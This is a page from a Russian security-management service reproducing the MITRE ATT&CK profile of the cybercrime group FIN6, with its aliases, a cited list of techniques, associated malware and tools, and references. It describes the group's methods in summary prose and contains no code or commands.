Cервис управления информационной безопасностью
Cервис управления информационной безопасностью
Поиск
Вход Регистрация
MITRE ATT&CK - Преступная группа FIN6
Риски
Каталоги
MITRE ATT&CK
Преступная группа
FIN6
Куда я попал?
SECURITM это SGRC система, ? автоматизирующая процессы в службах информационной безопасности. SECURITM помогает построить и управлять ИСПДн, КИИ, ГИС, СМИБ/СУИБ, банковскими системами защиты.
А еще SECURITM это место для обмена опытом и наработками для служб безопасности.
Подробнее
Наш канал

FIN6

FIN6 is a cyber crime group that has stolen payment card data and sold it for profit on underground marketplaces. This group has aggressively targeted and compromised point of sale (PoS) systems in the hospitality and retail sectors.(Citation: FireEye FIN6 April 2016)(Citation: FireEye FIN6 Apr 2019)
ID: G0037
Associated Groups: TAAL, ITG08, Skeleton Spider, Camouflage Tempest, Magecart Group 6
Version: 4.0
Created: 31 May 2017
Last Modified: 17 Nov 2024

Associated Group Descriptions
Name Description
TAAL (Citation: Microsoft Threat Actor Naming July 2023)
ITG08 (Citation: Security Intelligence More Eggs Aug 2019)
Skeleton Spider (Citation: Crowdstrike Global Threat Report Feb 2018)
Camouflage Tempest (Citation: Microsoft Threat Actor Naming July 2023)
Magecart Group 6 (Citation: Security Intelligence ITG08 April 2020)

Techniques Used
Domain ID Name Use
Enterprise T1087 .002 Account Discovery: Domain Account

FIN6 has used Metasploit’s PsExec NTDSGRAB module to obtain a copy of the victim's Active Directory database.(Citation: FireEye FIN6 April 2016)
Enterprise T1560 .003 Archive Collected Data: Archive via Custom Method

FIN6 has encoded data gathered from the victim with a simple substitution cipher and single-byte XOR using the 0xAA key, and Base64 with character permutation.(Citation: FireEye FIN6 April 2016)(Citation: Trend Micro FIN6 October 2019)
Enterprise T1547 .001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

FIN6 has used Registry Run keys to establish persistence for its downloader tools known as HARDTACK and SHIPBREAD.(Citation: FireEye FIN6 April 2016)
Enterprise T1110 .002 Brute Force: Password Cracking

FIN6 has extracted password hashes from ntds.dit to crack offline.(Citation: FireEye FIN6 April 2016)
Enterprise T1059 .001 Command and Scripting Interpreter: PowerShell

FIN6 has used PowerShell to gain access to merchant's networks, and a Metasploit PowerShell module to download and execute shellcode and to set up a local listener.(Citation: FireEye FIN6 April 2016)(Citation: FireEye FIN6 Apr 2019)(Citation: Visa FIN6 Feb 2019)
.003 Command and Scripting Interpreter: Windows Command Shell

FIN6 has used kill.bat script to disable security tools.(Citation: FireEye FIN6 Apr 2019)

.007 Command and Scripting Interpreter: JavaScript

FIN6 has used malicious JavaScript to steal payment card data from e-commerce sites.(Citation: Trend Micro FIN6 October 2019)

Enterprise T1555 .003 Credentials from Password Stores: Credentials from Web Browsers

FIN6 has used the Stealer One credential stealer to target web browsers.(Citation: Visa FIN6 Feb 2019)
Enterprise T1074 .002 Data Staged: Remote Data Staging

FIN6 actors have compressed data from remote systems and moved it to another staging system before exfiltration.(Citation: FireEye FIN6 April 2016)
Enterprise T1573 .002 Encrypted Channel: Asymmetric Cryptography

FIN6 used the Plink command-line utility to create SSH tunnels to C2 servers.(Citation: FireEye FIN6 April 2016)
Enterprise T1048 .003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol

FIN6 has sent stolen payment card data to remote servers via HTTP POSTs.(Citation: Trend Micro FIN6 October 2019)
Enterprise T1562 .001 Impair Defenses: Disable or Modify Tools

FIN6 has deployed a utility script named kill.bat to disable anti-virus.(Citation: FireEye FIN6 Apr 2019)
Enterprise T1070 .004 Indicator Removal: File Deletion

FIN6 has removed files from victim machines.(Citation: FireEye FIN6 April 2016)
Enterprise T1036 .004 Masquerading: Masquerade Task or Service

FIN6 has renamed the "psexec" service name to "mstdc" to masquerade as a legitimate Windows service.(Citation: FireEye FIN6 Apr 2019)

Enterprise T1003 .001 OS Credential Dumping: LSASS Memory

FIN6 has used Windows Credential Editor for credential dumping.(Citation: FireEye FIN6 April 2016)(Citation: FireEye FIN6 Apr 2019)

.003 OS Credential Dumping: NTDS

FIN6 has used Metasploit’s PsExec NTDSGRAB module to obtain a copy of the victim's Active Directory database.(Citation: FireEye FIN6 April 2016)(Citation: FireEye FIN6 Apr 2019)

Enterprise T1027 .010 Obfuscated Files or Information: Command Obfuscation

FIN6 has used encoded PowerShell commands.(Citation: Visa FIN6 Feb 2019)
Enterprise T1588 .002 Obtain Capabilities: Tool

FIN6 has obtained and used tools such as Mimikatz, Cobalt Strike, and AdFind.(Citation: Security Intelligence More Eggs Aug 2019)(Citation: FireEye FIN6 Apr 2019)
Enterprise T1069 .002 Permission Groups Discovery: Domain Groups

FIN6 has used tools like Adfind to query users, groups, organizational units, and trusts.(Citation: FireEye FIN6 Apr 2019)

Enterprise T1566 .001 Phishing: Spearphishing Attachment

FIN6 has targeted victims with e-mails containing malicious attachments.(Citation: Visa FIN6 Feb 2019)
.003 Phishing: Spearphishing via Service

FIN6 has used fake job advertisements sent via LinkedIn to spearphish targets.(Citation: Security Intelligence More Eggs Aug 2019)

Enterprise T1021 .001 Remote Services: Remote Desktop Protocol

FIN6 used RDP to move laterally in victim networks.(Citation: FireEye FIN6 April 2016)(Citation: FireEye FIN6 Apr 2019)
Enterprise T1053 .005 Scheduled Task/Job: Scheduled Task

FIN6 has used scheduled tasks to establish persistence for various malware it uses, including downloaders known as HARDTACK and SHIPBREAD and FrameworkPOS.(Citation: FireEye FIN6 April 2016)
Enterprise T1553 .002 Subvert Trust Controls: Code Signing

FIN6 has used Comodo code-signing certificates.(Citation: Security Intelligence More Eggs Aug 2019)

Enterprise T1569 .002 System Services: Service Execution

FIN6 has created Windows services to execute encoded PowerShell commands.(Citation: FireEye FIN6 Apr 2019)
Enterprise T1204 .002 User Execution: Malicious File

FIN6 has used malicious documents to lure victims into allowing execution of PowerShell scripts.(Citation: Visa FIN6 Feb 2019)

Software
ID Name References Techniques
S0503 FrameworkPOS (Citation: Crowdstrike Global Threat Report Feb 2018) (Citation: SentinelOne FrameworkPOS September 2019) (Citation: Trinity) (Citation: Visa FIN6 Feb 2019) Archive via Custom Method, Local Data Staging, Data from Local System, Process Discovery, Exfiltration Over Alternative Protocol
S0005 Windows Credential Editor (Citation: Amplia WCE) (Citation: FireEye FIN6 April 2016) LSASS Memory
S0381 FlawedAmmyy (Citation: Proofpoint TA505 Mar 2018) (Citation: Visa FIN6 Feb 2019) Windows Management Instrumentation, Screen Capture, System Owner/User Discovery, Rundll32, Keylogging, Symmetric Cryptography, Clipboard Data, Peripheral Device Discovery, System Information Discovery, Msiexec, Data from Local System, Exfiltration Over C2 Channel, PowerShell, Registry Run Keys / Startup Folder, Local Groups, Data Obfuscation, Input Capture, Security Software Discovery, Windows Command Shell, File Deletion, Web Protocols, Ingress Tool Transfer, Commonly Used Port
S0372 LockerGoga (Citation: CarbonBlack LockerGoga 2019) (Citation: FireEye FIN6 Apr 2019) (Citation: Unit42 LockerGoga 2019) Code Signing, Disable or Modify Tools, Account Access Removal, Data Encrypted for Impact, Lateral Tool Transfer, File Deletion, System Shutdown/Reboot
S0446 Ryuk (Citation: Bleeping Computer - Ryuk WoL) (Citation: CrowdStrike Ryuk January 2019) (Citation: FireEye FIN6 Apr 2019) (Citation: FireEye Ryuk and Trickbot January 2019) Scheduled Task, Match Legitimate Resource Name or Location, Service Stop, Windows File and Directory Permissions Modification, System Information Discovery, Native API, Masquerading, Process Injection, Traffic Signaling, SMB/Windows Admin Shares, System Network Configuration Discovery, File and Directory Discovery, Process Discovery, Registry Run Keys / Startup Folder, Disable or Modify Tools, Obfuscated Files or Information, Data Encrypted for Impact, System Language Discovery, Domain Accounts, Windows Command Shell, Access Token Manipulation, Inhibit System Recovery
S0154 Cobalt Strike (Citation: FireEye FIN6 Apr 2019) (Citation: cobaltstrike manual) Windows Management Instrumentation, Screen Capture, Rundll32, Standard Encoding, Keylogging, JavaScript, Bypass User Account Control, Sudo and Sudo Caching, Security Account Manager, DNS, Domain Account, Symmetric Cryptography, Windows Service, Domain Groups, SSH, System Service Discovery, Code Signing, Network Share Discovery, Application Layer Protocol, Native API, Data from Local System, Deobfuscate/Decode Files or Information, Process Injection, Timestomp, Reflective Code Loading, Scheduled Transfer, SMB/Windows Admin Shares, Protocol Tunneling, Browser Session Hijacking, Modify Registry, Windows Remote Management, LSASS Memory, Distributed Component Object Model, System Network Configuration Discovery, Office Template Macros, File and Directory Discovery, System Network Connections Discovery, Token Impersonation/Theft, Make and Impersonate Token, Process Discovery, Parent PID Spoofing, PowerShell, Multiband Communication, File Transfer Protocols, Local Groups, Disable or Modify Tools, Indicator Removal from Tools, Process Hollowing, Exploitation for Privilege Escalation, Obfuscated Files or Information, Exploitation for Client Execution, Asymmetric Cryptography, Non-Application Layer Protocol, Protocol or Service Impersonation, Query Registry, Data Transfer Size Limits, Domain Accounts, BITS Jobs, Domain Fronting, Python, Windows Command Shell, Web Protocols, Visual Basic, Remote System Discovery, Network Service Discovery, Software Discovery, Pass the Hash, Ingress Tool Transfer, Remote Desktop Protocol, Service Execution, Dynamic-link Library Injection, Internal Proxy, Custom Command and Control Protocol, Commonly Used Port, Local Accounts, Process Argument Spoofing
S0002 Mimikatz (Citation: Adsecurity Mimikatz Guide) (Citation: Deply Mimikatz) (Citation: Security Intelligence More Eggs Aug 2019) Security Account Manager, LSA Secrets, Credentials from Password Stores, Security Support Provider, Rogue Domain Controller, Credentials from Web Browsers, Private Keys, LSASS Memory, Golden Ticket, Pass the Ticket, Steal or Forge Authentication Certificates, Account Manipulation, SID-History Injection, Silver Ticket, Windows Credential Manager, Pass the Hash, DCSync
S0284 More_eggs (Citation: Crowdstrike GTR2020 Mar 2020) (Citation: ESET EvilNum July 2020) (Citation: SKID) (Citation: Security Intelligence More Eggs Aug 2019) (Citation: SpicyOmelette) (Citation: Talos Cobalt Group July 2018) (Citation: Terra Loader) (Citation: Visa FIN6 Feb 2019) System Owner/User Discovery, Standard Encoding, Encrypted/Encoded File, Internet Connection Discovery, Symmetric Cryptography, Code Signing, System Information Discovery, Deobfuscate/Decode Files or Information, System Network Configuration Discovery, Regsvr32, Security Software Discovery, Windows Command Shell, File Deletion, Web Protocols, Ingress Tool Transfer
S0632 GrimAgent (Citation: Group IB GrimAgent July 2021) Scheduled Task, System Owner/User Discovery, Standard Encoding, Symmetric Cryptography, System Information Discovery, Native API, Data from Local System, Deobfuscate/Decode Files or Information, Mutual Exclusion, Time Based Evasion, Binary Padding, System Network Configuration Discovery, File and Directory Discovery, Exfiltration Over C2 Channel, Registry Run Keys / Startup Folder, Obfuscated Files or Information, Asymmetric Cryptography, System Language Discovery, System Location Discovery, Windows Command Shell, Clear Persistence, File Deletion, Web Protocols, Ingress Tool Transfer, Junk Data
S0449 Maze (Citation: FireEye Maze May 2020) (Citation: McAfee Maze March 2020) (Citation: Sophos Maze VM September 2020) Scheduled Task, Windows Management Instrumentation, Service Stop, System Information Discovery, Msiexec, Native API, Junk Code Insertion, Indicator Removal, Dynamic Resolution, Masquerade Task or Service, System Network Connections Discovery, Process Discovery, Registry Run Keys / Startup Folder, Disable or Modify Tools, Obfuscated Files or Information, Run Virtual Instance, Data Encrypted for Impact, System Language Discovery, Windows Command Shell, Web Protocols, Dynamic-link Library Injection, Inhibit System Recovery, System Shutdown/Reboot
S0552 AdFind (Citation: FireEye FIN6 Apr 2019) (Citation: FireEye Ryuk and Trickbot January 2019) (Citation: Red Canary Hospital Thwarted Ryuk October 2020) Domain Account, Domain Groups, System Network Configuration Discovery, Domain Trust Discovery, Remote System Discovery
S0029 PsExec (Citation: FireEye FIN6 Apr 2019) (Citation: FireEye FIN6 April 2016) (Citation: Russinovich Sysinternals) (Citation: SANS PsExec) Windows Service, SMB/Windows Admin Shares, Domain Account, Lateral Tool Transfer, Service Execution

References

  1. FireEye Threat Intelligence. (2016, April). Follow the Money: Dissecting the Operations of the Cyber Crime Group FIN6. Retrieved November 17, 2024.
  2. CrowdStrike. (2018, February 26). CrowdStrike 2018 Global Threat Report. Retrieved October 10, 2018.
  3. McKeague, B. et al. (2019, April 5). Pick-Six: Intercepting a FIN6 Intrusion, an Actor Recently Tied to Ryuk and LockerGoga Ransomware. Retrieved April 17, 2019.
  4. Microsoft . (2023, July 12). How Microsoft names threat actors. Retrieved November 17, 2023.
  5. Kremez, V. (2019, September 19). FIN6 “FrameworkPOS”: Point-of-Sale Malware Analysis & Internals. Retrieved September 8, 2020.
  6. Chen, J. (2019, October 10). Magecart Card Skimmers Injected Into Online Shops. Retrieved September 9, 2020.
  7. Villadsen, O.. (2019, August 29). More_eggs, Anyone? Threat Actor ITG08 Strikes Again. Retrieved September 16, 2019.
  8. Visa Public. (2019, February). FIN6 Cybercrime Group Expands Threat to eCommerce Merchants. Retrieved September 16, 2019.
  9. Klijnsma, Y. (2018, September 11). Inside the Magecart Breach of British Airways: How 22 Lines of Code Claimed 380,000 Victims. Retrieved September 9, 2020.
  10. Villadsen, O. (2020, April 7). ITG08 (aka FIN6) Partners With TrickBot Gang, Uses Anchor Framework. Retrieved October 8, 2020.
  11. Klijnsma, Y. (2018, September 19). Another Victim of the Magecart Assault Emerges: Newegg. Retrieved September 9, 2020.
Навигация

Мы используем cookie-файлы, чтобы получить статистику, которая помогает нам улучшить сервис для вас с целью персонализации сервисов и предложений. Вы может прочитать подробнее о cookie-файлах или изменить настройки браузера. Продолжая пользоваться сайтом, вы даёте согласие на использование ваших cookie-файлов и соглашаетесь с Политикой обработки персональных данных.